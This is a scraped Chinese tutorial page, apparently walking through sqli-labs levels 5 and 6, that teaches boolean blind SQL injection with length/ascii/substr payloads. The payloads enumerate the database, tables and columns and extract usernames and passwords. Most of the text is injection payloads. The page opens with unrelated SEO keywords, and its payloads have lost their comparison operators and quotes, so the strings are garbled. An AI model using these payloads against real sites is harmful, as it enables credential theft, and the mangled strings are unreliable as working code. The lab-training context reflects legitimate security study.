如何拷贝服务器里面网站做备份,百度搜索引擎录入网站,搜狗seo怎么做,网站开发合同的缺陷目录
首先找到他们的闭合方式
操作
总结#xff1a; 第五关根据页面结果得知是字符型但是和前面四关还是不一样是因为页面虽然有东西。但是只有对于请求对错出现不一样页面其余的就没有了。这个时候我们用联合注入就没有用#xff0c;因为联合注入是需要页面有回显位。如果…
目录
首先找到他们的闭合方式
操作
总结 第五关根据页面结果得知是字符型但是和前面四关还是不一样是因为页面虽然有东西。但是只有对于请求对错出现不一样页面其余的就没有了。这个时候我们用联合注入就没有用因为联合注入是需要页面有回显位。如果数据 不显示只有对错页面显示我们可以选择布尔盲注。布尔盲注主要用到length(),ascii() ,substr()这三个函数首先通过length()函数确定长度再通过另外两个确定具体字符是什么。布尔盲注向对于联合注入来说需要花费大量时间。
首先找到他们的闭合方式 我们输入?id1’发现报错在后面加上注释符返回You are in,所以它的闭合方式就是用 ‘ 来闭合的并且我们知道如果语句是对的才返回You are in…我们希望看到的内容并不会在页面上得到反馈了就需要使用布尔盲注。
操作 ?id1and length((select database()))9-- #大于号可以换成小于号或者等于号主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4 ?id1and ascii(substr((select database()),1,1))115-- #substr(78909,1,1)7 substr(a,b,c)a是要截取的字符串b是截取的位置c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗这样我们可以很好确定数字根据数字找到对应的字符。 ?id1and length((select group_concat(table_name) from information_schema.tables where table_schemadatabase()))13-- 判断所有表名字符长度。 ?id1and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemadatabase()),1,1))99-- 逐一判断表名 ?id1and length((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers))20-- 判断所有字段名的长度 ?id1and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers),1,1))99-- 逐一判断字段名。 ?id1 and length((select group_concat(username,password) from users))109-- 判断字段内容长度 ?id1 and ascii(substr((select group_concat(username,password) from users),1,1))50-- 逐一检测内容。 总结 第六关和第五关是差不多的根据页面报错信息可以猜测id参数是双引号只需将第五关的单引号换成双引号就可以了
